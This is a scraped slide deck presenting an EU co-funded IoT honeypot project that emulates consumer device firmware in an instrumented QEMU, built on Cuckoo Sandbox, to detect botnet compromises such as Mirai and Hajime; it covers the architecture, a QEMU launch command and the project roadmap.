NCSC One: IoT Honeypot Pieter Jansen & Jurriaan Bremer On the - - PowerPoint PPT Presentation

ncsc one iot honeypot
SMART_READER_LITE
LIVE PREVIEW

NCSC One: IoT Honeypot Pieter Jansen & Jurriaan Bremer On the - - PowerPoint PPT Presentation

Sep 27, 2022 435 likes •863 views

NCSC One: IoT Honeypot Pieter Jansen & Jurriaan Bremer On the agenda: 1. Introduction 2. SBIR 3. Cuckoo Sandbox 4. Project 5. Architecture 6. Offline demo 7. Roadmap Introduction Pieter Jansen - CEO @ Cybersprint -

slide-1
SLIDE 1

NCSC One: IoT Honeypot

Pieter Jansen & Jurriaan Bremer

slide-2
SLIDE 2

On the agenda:

1. Introduction 2. SBIR 3. Cuckoo Sandbox 4. Project 5. Architecture 6. Offline demo 7. Roadmap

slide-3
SLIDE 3

Introduction

slide-4
SLIDE 4

Pieter Jansen

  • CEO @ Cybersprint
  • https://cybersprint.com
  • Team of 25 enthusiasts
  • Since 2015
  • 100% Dutch
  • Digital Risk Protection services
slide-5
SLIDE 5

Jurriaan Bremer

  • CEO, Hatching
  • https://hatching.io/
  • Lead Developer, Cuckoo Sandbox
  • https://cuckoosandbox.org/
  • 6+ years development on Cuckoo
  • Growing R&D team
slide-6
SLIDE 6

SBIR

This SBIR project is co-funded by the Internal Security Fund

  • f the European Union

Balancing Security and Mobility

slide-7
SLIDE 7
slide-8
SLIDE 8

SBIR

  • EU co-funded Project
  • SBIR stage 1 (feasibility)
  • SBIR stage 2 (realisation)
  • SBIR stage 3 (valorisation)
  • https://www.rvo.nl/subsidies-regelingen/sbir

You are here

slide-9
SLIDE 9

Cuckoo Sandbox

slide-10
SLIDE 10

Cuckoo Sandbox

  • Leading open source automated malware analysis project
  • https://cuckoosandbox.org/
  • Widely used throughout the security community
  • Hatching is the driving force behind the majority of Cuckoo innovations
  • Cuckoo forms basis of the IoT Honeypot project
slide-11
SLIDE 11
slide-12
SLIDE 12

Project

slide-13
SLIDE 13
  • Goal: develop a firmware-based, open source Internet of Things (IoT)

honeypot framework

  • Consumer network devices, e.g., those used by NCSC.NL personnel at home
  • IP camera’s, smart devices, etc
  • Reason: Mirai, Haijime, etc..

Project

[1/2]

slide-14
SLIDE 14
slide-15
SLIDE 15

Hajime Botnet Makes a Comeback With Massive Scan for MikroTik Routers

slide-16
SLIDE 16

Project overview - replication vs emulation

slide-17
SLIDE 17

Replication-approach

1. Connect to an IoT device 2. Store the conversation (example: HTML files) 3. Spin up a service on the same port/protocol 4. Playback the earlier captured conversation

slide-18
SLIDE 18

Replication-approach - conclusions

Easy to set up fake environments Did not go past login screen Was not convincing enough for attackers Would only capture attempts, not infections

slide-19
SLIDE 19

Project

  • Replication alternative did not work
  • Goal: create open source IoT Honeypotting framework
  • Goal: detect large-scale IoT compromise campaigns
  • Goal: detect new threats, generate new IoCs
  • Default credentials, exploits, etc
  • Scales: run dozens of IoT devices using a single server
  • Without requiring the original hardware
  • Relatively low cost & maintenance effort

[2/2]

slide-20
SLIDE 20

Existing projects

  • pyREbox, PANDA, DECAF, ISP RAS.
  • x86-only (pyREbox) and x86/ARM (PANDA, different use-case)
  • IoT firmware often ARM/MIPS/etc
slide-21
SLIDE 21

High-level project overview

  • Emulate IoT firmware using QEMU
  • Expose listening network services
  • Either to internal networks or public IPv4 / IPv6 addresses
  • Instrument behavioral aspects of running firmware
  • Wait for device to be compromised!
slide-22
SLIDE 22

Goal of the project?

  • Once a device is compromised, investigate :-)
  • Got system call traces and PCAPs
  • Reconstruct traffic to isolate exploit and/or payload
  • Alternative use-case: honey tokens
  • Intentionally vulnerable devices with interesting names (eg FREDERIKSKAZERNE CAM51)
  • Notifies owners if attackers abuse it
slide-23
SLIDE 23

Architecture

slide-24
SLIDE 24

IoT Honeypot Architecture

slide-25
SLIDE 25

QEMU

Loading of firmware non-trivial:

  • In practice most firmware is non-x86: ARM & MIPS
  • Needs specific QEMU command-line parameters etc

Instrumentation of QEMU interesting:

  • Not so much existing research on non-x86 QEMU VMI
  • Virtual Machine Introspection
  • Instrumentation required to learn what device is doing
  • E.g., logging system calls such as execve(2)
slide-26
SLIDE 26

Gathering results

  • We obtain network traffic from the outside
  • We obtain system calls from the device
  • Realtime data processing
  • Results stored for later research
  • Alerts emitted to custom Dashboard
  • Known vulnerability was used
  • ...
slide-27
SLIDE 27

QEMU Command-line usage MIPS image

/home/jbr/git/quailbox-qemu/build/mips-softmmu/qemu-system-mips

  • kernel /home/jbr/.quailbox/kernels/vmlinux-3.18.120-4kc-malta-cuckoo
  • nographic
  • netdev tap,id=net0,ifname=tap_qemu,script=no,downscript=no
  • M malta -m 512
  • hda /home/jbr/.quailbox/images/ext2fs-for-netgear-wnap210.image
  • device e1000,netdev=net0
  • display none
  • append console=ttyS0

rw root=/dev/sda init=/sbin/init

slide-28
SLIDE 28

QEMU Tiny Code Generator (“TCG”)

  • Efficient engine for translating ARM/MIPS/etc into an IL
  • Intermediate Language
  • IL translated into the native Host code, e.g., x86
  • Needs customization to add our VMI
  • Syscall capturing for ARM+MIPS
  • Linux Kernel modifications & tracing WIP
  • Memory tracking & dumping logic
  • Additional changes required for new bug classes
  • Instrumentation for specific applications etc
slide-29
SLIDE 29

Realtime tcpdump processing

  • Log & process HTTP(s) requests from the outside
  • Present network traffic to ruling engines
  • Suricata / Snort
  • Cuckoo / Proprietary Signatures
slide-30
SLIDE 30

Offline Demo

slide-31
SLIDE 31
slide-32
SLIDE 32
slide-33
SLIDE 33
slide-34
SLIDE 34
slide-35
SLIDE 35

X X

slide-36
SLIDE 36

Roadmap

slide-37
SLIDE 37

Roadmap

  • Create web interface for managing virtual IoT environments
  • “Load” support for many more firmware images
  • Tailored QEMU VMI support for:
  • Different CPU architectures
  • Different known versions of Linux kernel for allowing in-depth VMI
  • E.g., through Volatility / Rekall integration
  • Documentation of more relevant bug classes
  • Capability for identifying said bug classes
  • Protection against QEMU breakouts..
  • Interaction through simulation of peripherals like camera/files/sensors
  • OT/SCADA/ICS applications (virtual Borssele)
  • So much more.. ;-)
slide-38
SLIDE 38

Valorization

slide-39
SLIDE 39

Valorization: Commercial Applications

  • Fuzzing as a Service
  • Provide security testing services for hardware providers, allowing large

scale/automated testing for any firmware

  • Commercial / open source bespoke additions for specific use-cases
  • OT-applications, applications for non-standard firmware
  • Hosting of virtual IoT Environments
  • Creating virtual 'digital twin' of sensitive IoT environments for research purposes
  • Collect threat intelligence to support adversary attribution research
slide-40
SLIDE 40

How you can help

1. Share your firmware 2. Provide testing grounds 3. Spread the word!

slide-41
SLIDE 41

Credits

The HoneyNED project team Andrei Costin (ancostin@jyu.fi) Assistant Professor in Cybersecurity/IoT - welcomes research and collaboration opportunities

slide-42
SLIDE 42

Want to know more? Get in touch!

pj@cybersprint.com | jbr@hatching.io

Questions?